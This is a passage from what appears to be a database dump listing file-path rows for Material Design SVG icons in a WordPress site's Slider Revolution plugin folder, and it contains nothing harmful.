/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_in_page_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_in_page_24px.svg'),(2204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_replace_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_replace_24px.svg'),(2205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_fingerprint_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_fingerprint_24px.svg'),(2206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_land_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_land_24px.svg'),(2207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_takeoff_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_takeoff_24px.svg'),(2208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_back_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_back_24px.svg'),(2209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_front_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_front_24px.svg'),(2210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gavel_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gavel_24px.svg'),(2211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_get_app_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_get_app_24px.svg'),(2212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gif_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gif_24px.svg'),(2213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_grade_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_grade_24px.svg'),(2214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_group_work_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_group_work_24px.svg'),(2215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_24px.svg'),(2216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_outline_24px.svg'),(2217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_highlight_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_highlight_off_24px.svg'),(2218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_history_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_history_24px.svg'),(2219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_home_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_home_24px.svg'),(2220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_empty_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_empty_24px.svg'),(2221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_full_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_full_24px.svg'),(2222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_http_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_http_24px.svg'),(2223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_https_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_https_24px.svg'),(2224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_important_devices_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_important_devices_24px.svg'),(2225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_24px.svg'),(2226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_outline_24px.svg'),(2227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_input_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_input_24px.svg'),(2228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_invert_colors_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_invert_colors_24px.svg'),(2229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_24px.svg'),(2230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_outline_24px.svg'),(2231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_language_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_language_24px.svg'),(2232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_launch_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_launch_24px.svg'),(2233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lightbulb_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lightbulb_outline_24px.svg'),(2234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_style_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_style_24px.svg'),(2235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_weight_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_weight_24px.svg'),(2236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_list_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_list_24px.svg'),(2237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_24px.svg'),(2238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_open_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_open_24px.svg'),(2239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_outline_24px.svg'),(2240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_loyalty_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_loyalty_24px.svg'),(2241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_markunread_mailbox_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_markunread_mailbox_24px.svg'),(2242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_motorcycle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_motorcycle_24px.svg'),(2243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_note_add_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_note_add_24px.svg'),(2244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_offline_pin_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_offline_pin_24px.svg'),(2245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_opacity_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_opacity_24px.svg'),(2246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_in_browser_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_in_browser_24px.svg'),(2247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_in_new_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_in_new_24px.svg'),(2248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_with_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_with_24px.svg'),(2249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pageview_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pageview_24px.svg'),(2250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pan_tool_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pan_tool_24px.svg'),(2251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_payment_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_payment_24px.svg'),(2252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_camera_mic_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_camera_mic_24px.svg'),(2253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_contact_calendar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_contact_calendar_24px.svg'),(2254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_data_setting_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_data_setting_24px.svg'),(2255,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_device_information_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_device_information_24px.svg'),(2256,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_identity_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_identity_24px.svg'),(2257,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_media_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_media_24px.svg'),(2258,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_phone_msg_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_phone_msg_24px.svg'),(2259,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_scan_wifi_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_scan_wifi_24px.svg'),(2260,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pets_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pets_24px.svg'),(2261,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_24px.svg'),(2262,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_alt_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_alt_24px.svg'),(2263,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_play_for_work_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_play_for_work_24px.svg'),(2264,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_polymer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_polymer_24px.svg'),(2265,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_power_settings_new_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_power_settings_new_24px.svg'),(2266,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pregnant_woman_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pregnant_woman_24px.svg'),(2267,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_print_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_print_24px.svg'),(2268,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_query_builder_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_query_builder_24px.svg'),(2269,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_question_answer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_question_answer_24px.svg'),(2270,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_receipt_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_receipt_24px.svg'),(2271,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_record_voice_over_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_record_voice_over_24px.svg'),(2272,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_redeem_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_redeem_24px.svg'),(2273,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_reorder_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_reorder_24px.svg'),(2274,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_report_problem_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_report_problem_24px.svg'),(2275,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_restore_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_restore_24px.svg'),(2276,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_room_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_room_24px.svg'),(2277,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rounded_corner_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rounded_corner_24px.svg'),(2278,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rowing_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rowing_24px.svg'),(2279,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_schedule_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_schedule_24px.svg'),(2280,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_search_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_search_24px.svg'),(2281,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_24px.svg'),(2282,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_applications_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_applications_24px.svg'),(2283,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_backup_restore_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_backup_restore_24px.svg'),(2284,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_bluetooth_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_bluetooth_24px.svg'),(2285,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_brightness_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_brightness_24px.svg'),(2286,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_cell_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_cell_24px.svg'),(2287,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_ethernet_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_ethernet_24px.svg'),(2288,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_antenna_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_antenna_24px.svg'),(2289,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_component_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_component_24px.svg'),(2290,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_composite_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_composite_24px.svg'),(2291,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_hdmi_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_hdmi_24px.svg'),(2292,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_svideo_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_svideo_24px.svg'),(2293,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_overscan_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_overscan_24px.svg'),(2294,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_phone_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_phone_24px.svg'),(2295,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_power_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_power_24px.svg'),(2296,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_remote_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_remote_24px.svg'),(2297,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_voice_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_voice_24px.svg'),(2298,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_24px.svg'),(2299,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_two_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_two_24px.svg'),(2300,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_basket_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_basket_24px.svg'),(2301,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_cart_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_cart_24px.svg'),(2302,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_speaker_notes_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_speaker_notes_24px.svg'),(2303,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_spellcheck_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_spellcheck_24px.svg'),(2304,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_stars_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_stars_24px.svg'),(2305,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_store_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_store_24px.svg'),(2306,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_subject_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_subject_24px.svg'),(2307,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_supervisor_account_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_supervisor_account_24px.svg'),(2308,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_horiz_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_horiz_24px.svg'),(2309,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vert_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vert_24px.svg'),(2310,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vertical_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vertical_circle_24px.svg'),(2311,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_system_update_alt_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_system_update_alt_24px.svg'),(2312,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_24px.svg'),(2313,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_unselected_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_unselected_24px.svg'),(2314,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_theaters_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_theaters_24px.svg'),(2315,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_down_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_down_24px.svg'),(2316,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_up_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_up_24px.svg'),(2317,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumbs_up_down_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumbs_up_down_24px.svg'),(2318,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_timeline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_timeline_24px.svg'),(2319,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toc_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toc_24px.svg'),(2320,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_today_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_today_24px.svg'),(2321,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toll_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toll_24px.svg'),(2322,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_touch_app_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_touch_app_24px.svg'),(2323,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_track_changes_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_track_changes_24px.svg'),(2324,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_translate_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_translate_24px.svg'),(2325,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_down_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_down_24px.svg'),(2326,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_flat_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_flat_24px.svg'),(2327,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_up_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_up_24px.svg'),(2328,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_turned_in_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_turned_in_24px.svg'),(2329,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_turned_in_not_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_turned_in_not_24px.svg'),(2330,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_update_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_update_24px.svg'),(2331,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_verified_user_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_verified_user_24px.svg'),(2332,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_agenda_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_agenda_24px.svg'),(2333,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_array_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_array_24px.svg'),(2334,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_carousel_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_carousel_24px.svg'),(2335,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_column_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_column_24px.svg'),(2336,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_day_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_day_24px.svg'),(2337,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_headline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_headline_24px.svg'),(2338,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_list_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_list_24px.svg'),(2339,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_module_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_module_24px.svg'),(2340,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_quilt_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_quilt_24px.svg'),(2341,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_stream_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_stream_24px.svg'),(2342,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_week_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_week_24px.svg'),(2343,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_24px.svg'),(2344,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_off_24px.svg'),(2345,'